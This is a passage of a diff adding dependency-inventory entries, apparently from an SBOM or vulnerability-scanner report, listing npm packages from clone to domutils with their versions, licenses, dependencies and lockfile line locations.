+ "Name": "clone", + "Identifier": { + "PURL": "pkg:npm/clone@1.0.4", + "UID": "c22546e280b7ad80" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7154, + "EndLine": 7162 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cmd-shim@7.0.0", + "Name": "cmd-shim", + "Identifier": { + "PURL": "pkg:npm/cmd-shim@7.0.0", + "UID": "59af6f93a33729ba" + }, + "Version": "7.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14171, + "EndLine": 14178 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "code-point-at@1.1.0", + "Name": "code-point-at", + "Identifier": { + "PURL": "pkg:npm/code-point-at@1.1.0", + "UID": "81947ca40cbbe83f" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7174, + "EndLine": 7182 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color@3.2.1", + "Name": "color", + "Identifier": { + "PURL": "pkg:npm/color@3.2.1", + "UID": "e49e83c1bcf16436" + }, + "Version": "3.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@1.9.3", + "color-string@1.9.1" + ], + "Locations": [ + { + "StartLine": 18152, + "EndLine": 18161 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color@4.2.3", + "Name": "color", + "Identifier": { + "PURL": "pkg:npm/color@4.2.3", + "UID": "fac2dc5e494ee5c2" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@2.0.1", + "color-string@1.9.1" + ], + "Locations": [ + { + "StartLine": 7190, + "EndLine": 7202 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-convert@1.9.3", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@1.9.3", + "UID": "c859797d8d518ebf" + }, + "Version": "1.9.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.3" + ], + "Locations": [ + { + "StartLine": 524, + "EndLine": 532 + }, + { + "StartLine": 18162, + "EndLine": 18170 + }, + { + "StartLine": 19730, + "EndLine": 19739 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "e8f659b6a4eb5ed" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4" + ], + "Locations": [ + { + "StartLine": 7203, + "EndLine": 7214 + }, + { + "StartLine": 14179, + "EndLine": 14191 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-name@1.1.3", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.3", + "UID": "5497b0537320fbcb" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 533, + "EndLine": 538 + }, + { + "StartLine": 18171, + "EndLine": 18176 + }, + { + "StartLine": 19740, + "EndLine": 19746 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "87d55b81f0295834" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7215, + "EndLine": 7220 + }, + { + "StartLine": 14192, + "EndLine": 14198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-name@2.0.2", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@2.0.2", + "UID": "ec3f28b79f209a1d" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7230, + "EndLine": 7238 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-parse@2.0.2", + "Name": "color-parse", + "Identifier": { + "PURL": "pkg:npm/color-parse@2.0.2", + "UID": "8bd6000b685bc20e" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@2.0.2" + ], + "Locations": [ + { + "StartLine": 7221, + "EndLine": 7229 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-rgba@3.0.0", + "Name": "color-rgba", + "Identifier": { + "PURL": "pkg:npm/color-rgba@3.0.0", + "UID": "f8c4cc8b7aa89d11" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-parse@2.0.2", + "color-space@2.3.2" + ], + "Locations": [ + { + "StartLine": 7239, + "EndLine": 7248 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-space@2.3.2", + "Name": "color-space", + "Identifier": { + "PURL": "pkg:npm/color-space@2.3.2", + "UID": "fe0cbee362a20ffd" + }, + "Version": "2.3.2", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7249, + "EndLine": 7254 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-string@1.9.1", + "Name": "color-string", + "Identifier": { + "PURL": "pkg:npm/color-string@1.9.1", + "UID": "e7c23a736b7035ed" + }, + "Version": "1.9.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4", + "simple-swizzle@0.2.4" + ], + "Locations": [ + { + "StartLine": 7255, + "EndLine": 7264 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-support@1.1.3", + "Name": "color-support", + "Identifier": { + "PURL": "pkg:npm/color-support@1.1.3", + "UID": "7a7d5bf928ce6f84" + }, + "Version": "1.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7265, + "EndLine": 7274 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "colorette@1.4.0", + "Name": "colorette", + "Identifier": { + "PURL": "pkg:npm/colorette@1.4.0", + "UID": "8fd771b475d1ca2f" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7275, + "EndLine": 7281 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "combined-stream@1.0.8", + "Name": "combined-stream", + "Identifier": { + "PURL": "pkg:npm/combined-stream@1.0.8", + "UID": "bc11066619f49d7b" + }, + "Version": "1.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delayed-stream@1.0.0" + ], + "Locations": [ + { + "StartLine": 7282, + "EndLine": 7293 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "command-exists@1.2.9", + "Name": "command-exists", + "Identifier": { + "PURL": "pkg:npm/command-exists@1.2.9", + "UID": "1b817a11e4818617" + }, + "Version": "1.2.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7294, + "EndLine": 7300 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@12.1.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@12.1.0", + "UID": "14f2721297505ec3" + }, + "Version": "12.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18695, + "EndLine": 18703 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@13.1.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@13.1.0", + "UID": "bb3fa0a0d6c891e1" + }, + "Version": "13.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17597, + "EndLine": 17605 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@2.20.3", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@2.20.3", + "UID": "1ecb21087f876383" + }, + "Version": "2.20.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20539, + "EndLine": 20544 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@7.2.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@7.2.0", + "UID": "4addfd5cedcf398e" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20423, + "EndLine": 20431 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@9.5.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@9.5.0", + "UID": "3de59038a0079788" + }, + "Version": "9.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7301, + "EndLine": 7310 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "common-ancestor-path@1.0.1", + "Name": "common-ancestor-path", + "Identifier": { + "PURL": "pkg:npm/common-ancestor-path@1.0.1", + "UID": "fb03d8d5d0ccf835" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14199, + "EndLine": 14203 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "compressible@2.0.18", + "Name": "compressible", + "Identifier": { + "PURL": "pkg:npm/compressible@2.0.18", + "UID": "fd748365cdb4e6dc" + }, + "Version": "2.0.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-db@1.52.0" + ], + "Locations": [ + { + "StartLine": 7311, + "EndLine": 7323 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "compression@1.8.1", + "Name": "compression", + "Identifier": { + "PURL": "pkg:npm/compression@1.8.1", + "UID": "d6d16cfb7a9a0a79" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bytes@3.1.2", + "compressible@2.0.18", + "debug@2.6.9", + "negotiator@0.6.4", + "on-headers@1.1.0", + "safe-buffer@5.2.1", + "vary@1.1.2" + ], + "Locations": [ + { + "StartLine": 7324, + "EndLine": 7342 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "concat-map@0.0.1", + "Name": "concat-map", + "Identifier": { + "PURL": "pkg:npm/concat-map@0.0.1", + "UID": "eed36198cca27652" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7360, + "EndLine": 7365 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "connect@3.7.0", + "Name": "connect", + "Identifier": { + "PURL": "pkg:npm/connect@3.7.0", + "UID": "487429269ce0b974" + }, + "Version": "3.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "finalhandler@1.1.2", + "parseurl@1.3.3", + "utils-merge@1.0.1" + ], + "Locations": [ + { + "StartLine": 7366, + "EndLine": 7380 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "console-control-strings@1.1.0", + "Name": "console-control-strings", + "Identifier": { + "PURL": "pkg:npm/console-control-strings@1.1.0", + "UID": "f76bd653878f04a4" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7396, + "EndLine": 7401 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "content-type@1.0.5", + "Name": "content-type", + "Identifier": { + "PURL": "pkg:npm/content-type@1.0.5", + "UID": "3f97b127eb54c6a" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7402, + "EndLine": 7411 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "convert-source-map@2.0.0", + "Name": "convert-source-map", + "Identifier": { + "PURL": "pkg:npm/convert-source-map@2.0.0", + "UID": "d3e0904d5263fddd" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7412, + "EndLine": 7417 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "core-js@1.2.7", + "Name": "core-js", + "Identifier": { + "PURL": "pkg:npm/core-js@1.2.7", + "UID": "88323f6ab79972fa" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7418, + "EndLine": 7424 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "core-js-compat@3.45.1", + "Name": "core-js-compat", + "Identifier": { + "PURL": "pkg:npm/core-js-compat@3.45.1", + "UID": "de79c5fcf78157bb" + }, + "Version": "3.45.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "browserslist@4.26.3" + ], + "Locations": [ + { + "StartLine": 7425, + "EndLine": 7437 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "core-util-is@1.0.3", + "Name": "core-util-is", + "Identifier": { + "PURL": "pkg:npm/core-util-is@1.0.3", + "UID": "328598584642e811" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7438, + "EndLine": 7443 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cosmiconfig@8.3.6", + "Name": "cosmiconfig", + "Identifier": { + "PURL": "pkg:npm/cosmiconfig@8.3.6", + "UID": "590154b20d5ccc78" + }, + "Version": "8.3.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "import-fresh@3.3.1", + "js-yaml@4.1.0", + "parse-json@5.2.0", + "path-type@4.0.0", + "typescript@5.9.3" + ], + "Locations": [ + { + "StartLine": 5156, + "EndLine": 5181 + }, + { + "StartLine": 5242, + "EndLine": 5267 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cosmiconfig@9.0.0", + "Name": "cosmiconfig", + "Identifier": { + "PURL": "pkg:npm/cosmiconfig@9.0.0", + "UID": "f0c094ee8a6fe3ce" + }, + "Version": "9.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "env-paths@2.2.1", + "import-fresh@3.3.1", + "js-yaml@4.1.0", + "parse-json@5.2.0", + "typescript@5.9.3" + ], + "Locations": [ + { + "StartLine": 7444, + "EndLine": 7470 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cross-spawn@7.0.6", + "Name": "cross-spawn", + "Identifier": { + "PURL": "pkg:npm/cross-spawn@7.0.6", + "UID": "9ee160f916dde12c" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-key@3.1.1", + "shebang-command@2.0.0", + "which@2.0.2" + ], + "Locations": [ + { + "StartLine": 7493, + "EndLine": 7506 + }, + { + "StartLine": 14204, + "EndLine": 14218 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-color-keywords@1.0.0", + "Name": "css-color-keywords", + "Identifier": { + "PURL": "pkg:npm/css-color-keywords@1.0.0", + "UID": "7279c827477baed8" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7507, + "EndLine": 7515 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-line-break@2.1.0", + "Name": "css-line-break", + "Identifier": { + "PURL": "pkg:npm/css-line-break@2.1.0", + "UID": "205a52c74078f4d9" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "utrie@1.0.2" + ], + "Locations": [ + { + "StartLine": 7516, + "EndLine": 7524 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-select@5.2.2", + "Name": "css-select", + "Identifier": { + "PURL": "pkg:npm/css-select@5.2.2", + "UID": "c1142afa14774334" + }, + "Version": "5.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "boolbase@1.0.0", + "css-what@6.2.2", + "domhandler@5.0.3", + "domutils@3.2.2", + "nth-check@2.1.1" + ], + "Locations": [ + { + "StartLine": 7525, + "EndLine": 7540 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-to-react-native@3.2.0", + "Name": "css-to-react-native", + "Identifier": { + "PURL": "pkg:npm/css-to-react-native@3.2.0", + "UID": "81b41aad14d22700" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelize@1.0.1", + "css-color-keywords@1.0.0", + "postcss-value-parser@4.2.0" + ], + "Locations": [ + { + "StartLine": 7541, + "EndLine": 7551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-tree@1.1.3", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@1.1.3", + "UID": "4dcff6a3da776604" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.14", + "source-map@0.6.1" + ], + "Locations": [ + { + "StartLine": 7552, + "EndLine": 7564 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-tree@2.2.1", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@2.2.1", + "UID": "ce3447fad55a0bff" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.28", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 7590, + "EndLine": 7603 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-tree@2.3.1", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@2.3.1", + "UID": "fac74808b12b4d3b" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.30", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 20432, + "EndLine": 20444 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "css-what@6.2.2", + "Name": "css-what", + "Identifier": { + "PURL": "pkg:npm/css-what@6.2.2", + "UID": "535a7a30445a30d6" + }, + "Version": "6.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7565, + "EndLine": 7576 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cssesc@3.0.0", + "Name": "cssesc", + "Identifier": { + "PURL": "pkg:npm/cssesc@3.0.0", + "UID": "bc375f8fe89ab9d7" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14240, + "EndLine": 14252 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "csso@5.0.5", + "Name": "csso", + "Identifier": { + "PURL": "pkg:npm/csso@5.0.5", + "UID": "95e6071e7bd200dc" + }, + "Version": "5.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-tree@2.2.1" + ], + "Locations": [ + { + "StartLine": 7577, + "EndLine": 7589 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "csstype@3.1.3", + "Name": "csstype", + "Identifier": { + "PURL": "pkg:npm/csstype@3.1.3", + "UID": "6a7c0288bdc82f59" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7610, + "EndLine": 7616 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dayjs@1.11.18", + "Name": "dayjs", + "Identifier": { + "PURL": "pkg:npm/dayjs@1.11.18", + "UID": "ae99dfcdb6be87aa" + }, + "Version": "1.11.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7671, + "EndLine": 7677 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "debug@2.6.9", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@2.6.9", + "UID": "a89c5a866f6bb410" + }, + "Version": "2.6.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.0.0" + ], + "Locations": [ + { + "StartLine": 6665, + "EndLine": 6674 + }, + { + "StartLine": 7343, + "EndLine": 7352 + }, + { + "StartLine": 7381, + "EndLine": 7389 + }, + { + "StartLine": 9267, + "EndLine": 9275 + }, + { + "StartLine": 11816, + "EndLine": 11824 + }, + { + "StartLine": 19324, + "EndLine": 19332 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "c55a5d5b5cce812d" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.1.3" + ], + "Locations": [ + { + "StartLine": 7678, + "EndLine": 7694 + }, + { + "StartLine": 14253, + "EndLine": 14270 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decamelize@1.2.0", + "Name": "decamelize", + "Identifier": { + "PURL": "pkg:npm/decamelize@1.2.0", + "UID": "e3a7003efcb8d07a" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7695, + "EndLine": 7703 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decamelize-keys@1.1.1", + "Name": "decamelize-keys", + "Identifier": { + "PURL": "pkg:npm/decamelize-keys@1.1.1", + "UID": "2ed052259c13ee31" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decamelize@1.2.0", + "map-obj@1.0.1" + ], + "Locations": [ + { + "StartLine": 7704, + "EndLine": 7719 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decode-uri-component@0.2.2", + "Name": "decode-uri-component", + "Identifier": { + "PURL": "pkg:npm/decode-uri-component@0.2.2", + "UID": "fdd22f9fcd2eaf" + }, + "Version": "0.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7729, + "EndLine": 7737 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decompress-response@6.0.0", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@6.0.0", + "UID": "244cbc3b112694da" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mimic-response@3.1.0" + ], + "Locations": [ + { + "StartLine": 7738, + "EndLine": 7752 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "deep-extend@0.6.0", + "Name": "deep-extend", + "Identifier": { + "PURL": "pkg:npm/deep-extend@0.6.0", + "UID": "d96d23cbff90a14" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7768, + "EndLine": 7776 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "deepmerge@3.3.0", + "Name": "deepmerge", + "Identifier": { + "PURL": "pkg:npm/deepmerge@3.3.0", + "UID": "4b4da8eb91825209" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2152, + "EndLine": 2160 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "deepmerge@4.3.1", + "Name": "deepmerge", + "Identifier": { + "PURL": "pkg:npm/deepmerge@4.3.1", + "UID": "17b88f6377ec65b3" + }, + "Version": "4.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7784, + "EndLine": 7792 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "defaults@1.0.4", + "Name": "defaults", + "Identifier": { + "PURL": "pkg:npm/defaults@1.0.4", + "UID": "750f5795c13c80bf" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "clone@1.0.4" + ], + "Locations": [ + { + "StartLine": 7793, + "EndLine": 7804 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "define-data-property@1.1.4", + "Name": "define-data-property", + "Identifier": { + "PURL": "pkg:npm/define-data-property@1.1.4", + "UID": "e8bc397498fdf87a" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-define-property@1.0.1", + "es-errors@1.3.0", + "gopd@1.2.0" + ], + "Locations": [ + { + "StartLine": 7805, + "EndLine": 7821 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "delayed-stream@1.0.0", + "Name": "delayed-stream", + "Identifier": { + "PURL": "pkg:npm/delayed-stream@1.0.0", + "UID": "9725f4595650f3a1" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7840, + "EndLine": 7848 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "delegates@1.0.0", + "Name": "delegates", + "Identifier": { + "PURL": "pkg:npm/delegates@1.0.0", + "UID": "91d8b2836b187ee9" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7849, + "EndLine": 7854 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "depd@2.0.0", + "Name": "depd", + "Identifier": { + "PURL": "pkg:npm/depd@2.0.0", + "UID": "1f1893b7fe7982fd" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7855, + "EndLine": 7863 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "destroy@1.2.0", + "Name": "destroy", + "Identifier": { + "PURL": "pkg:npm/destroy@1.2.0", + "UID": "bcd60dccdcfb8166" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7884, + "EndLine": 7893 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "detect-indent@6.1.0", + "Name": "detect-indent", + "Identifier": { + "PURL": "pkg:npm/detect-indent@6.1.0", + "UID": "9b32a1024de9297f" + }, + "Version": "6.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7894, + "EndLine": 7902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "detect-libc@2.1.2", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@2.1.2", + "UID": "fb44c10a49e991c7" + }, + "Version": "2.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7903, + "EndLine": 7911 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "diff@8.0.2", + "Name": "diff", + "Identifier": { + "PURL": "pkg:npm/diff@8.0.2", + "UID": "cb8731532713510" + }, + "Version": "8.0.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14271, + "EndLine": 14278 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dom-serializer@2.0.0", + "Name": "dom-serializer", + "Identifier": { + "PURL": "pkg:npm/dom-serializer@2.0.0", + "UID": "14d2f52465f3bca3" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0", + "domhandler@5.0.3", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 7958, + "EndLine": 7971 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domelementtype@2.3.0", + "Name": "domelementtype", + "Identifier": { + "PURL": "pkg:npm/domelementtype@2.3.0", + "UID": "eae0dcc2e241e569" + }, + "Version": "2.3.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7972, + "EndLine": 7983 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domhandler@5.0.3", + "Name": "domhandler", + "Identifier": { + "PURL": "pkg:npm/domhandler@5.0.3", + "UID": "6dab5252439f6b75" + }, + "Version": "5.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0" + ], + "Locations": [ + { + "StartLine": 7984, + "EndLine": 7998 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domutils@3.2.2", + "Name": "domutils", + "Identifier": { + "PURL": "pkg:npm/domutils@3.2.2", + "UID": 